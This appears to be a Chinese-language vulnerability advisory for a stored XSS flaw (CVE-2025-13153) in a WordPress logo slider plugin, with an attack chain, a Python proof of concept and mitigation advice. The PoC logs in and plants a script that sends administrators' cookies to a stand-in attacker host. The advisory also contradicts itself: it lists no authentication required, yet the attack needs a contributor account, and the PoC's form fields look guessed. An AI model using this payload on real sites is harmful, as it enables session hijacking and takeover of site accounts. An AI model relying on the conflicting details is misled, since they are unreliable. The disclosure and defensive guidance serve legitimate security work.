CVE-2025-13153 WordPress Logo Slider插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13153

漏洞类型

存储型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Logo Slider WordPress plugin

漏洞概述

CVE-2025-13153是WordPress Logo Slider插件的一个存储型跨站脚本(XSS)漏洞。该插件在4.9.0版本之前未对部分滑块选项参数进行充分的验证和转义处理，直接将用户输入的内容输出到管理后台页面中。攻击者可以利用此漏洞，通过在插件的滑块选项中注入恶意JavaScript代码，当其他具有管理权限的用户访问相关页面时，恶意脚本将自动执行。攻击者可通过此方式窃取会话Cookie、劫持用户会话、修改页面内容或进行其他恶意操作。由于该插件面向所有WordPress站点开放使用，受影响范围较广。虽然CVSS评分为6.1(中危级别)，但由于攻击复杂度较低且不需要高权限即可实施，仍需引起重视。建议受影响的站点管理员尽快升级到4.9.0或更高版本，并审查近期是否有异常的管理员活动。

技术细节

该漏洞源于Logo Slider插件在处理滑块配置选项时缺少输入验证和输出编码。攻击者（具有contributor角色或更高权限）可以在创建或编辑滑块时，在特定选项字段中插入恶意JavaScript代码。插件在后台仪表盘页面显示这些选项时，直接将未经转义的用户输入渲染到HTML中，导致恶意脚本在页面加载时执行。攻击者可通过社工手段诱导管理员访问恶意页面，或等待管理员日常访问时自动触发。成功利用后，攻击者可获取管理员权限，执行任意前端操作，或进一步渗透服务器。此漏洞属于典型的存储型XSS，恶意载荷持久存在于数据库中，影响范围更广。修复版本4.9.0增加了对所有用户输入的严格验证和适当的HTML实体转义处理。

攻击链分析

STEP 1

步骤1

攻击者登录WordPress后台，获得contributor或更高权限账户

STEP 2

步骤2

导航到Logo Slider插件的滑块设置页面

STEP 3

步骤3

在滑块选项字段中注入恶意JavaScript代码，如窃取Cookie的脚本

STEP 4

步骤4

保存滑块配置，恶意载荷被持久化存储到数据库中

STEP 5

步骤5

当管理员或具有高权限用户访问该滑块设置页面时，恶意脚本自动执行

STEP 6

步骤6

攻击者通过窃取的会话Cookie劫持管理员账户，或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2025-13153 PoC - Logo Slider WordPress Plugin Stored XSS
# Target: WordPress site with Logo Slider plugin < 4.9.0

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "contributor_user"
PASSWORD = "user_password"

def get_nonce(login_html):
    """Extract WordPress nonce from login page"""
    match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', login_html)
    return match.group(1) if match else None

def login():
    """Authenticate to WordPress"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/wp-login.php"
    resp = session.get(login_url)
    nonce = get_nonce(resp.text)
    
    login_data = {
        "log": USERNAME,
        "pwd": PASSWORD,
        "wp-submit": "Log In",
        "_wpnonce": nonce,
        "redirect_to": "/wp-admin/"
    }
    session.post(login_url, data=login_data)
    return session

def inject_xss_payload(session):
    """Inject stored XSS payload via plugin's slider options"""
    # Malicious payload - steals admin cookies
    xss_payload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'
    
    # Create/Edit slider with malicious option
    slider_url = f"{TARGET_URL}/wp-admin/admin.php?page=logo-slider-settings"
    
    # The plugin stores slider options without sanitization
    slider_data = {
        "slider_name": "Malicious Slider",
        "slider_options": xss_payload,  # XSS payload injected here
        "submit": "Save"
    }
    session.post(slider_url, data=slider_data)
    print("[+] XSS payload injected successfully")
    print("[*] Payload will execute when admin views the slider settings page")

if __name__ == "__main__":
    print("[*] CVE-2025-13153 - Logo Slider Stored XSS PoC")
    session = login()
    inject_xss_payload(session)

影响范围

Logo Slider WordPress plugin < 4.9.0

防御指南

临时缓解措施

在无法立即升级的情况下，可临时禁用Logo Slider插件或限制低权限用户创建/编辑滑块的权限。同时可在WAF(Web应用防火墙)中配置XSS防护规则，对包含<script>标签或JavaScript事件的请求进行拦截。建议管理员检查wp_options表中是否有异常的滑块配置数据，并关注站点访问日志中是否存在异常的API请求。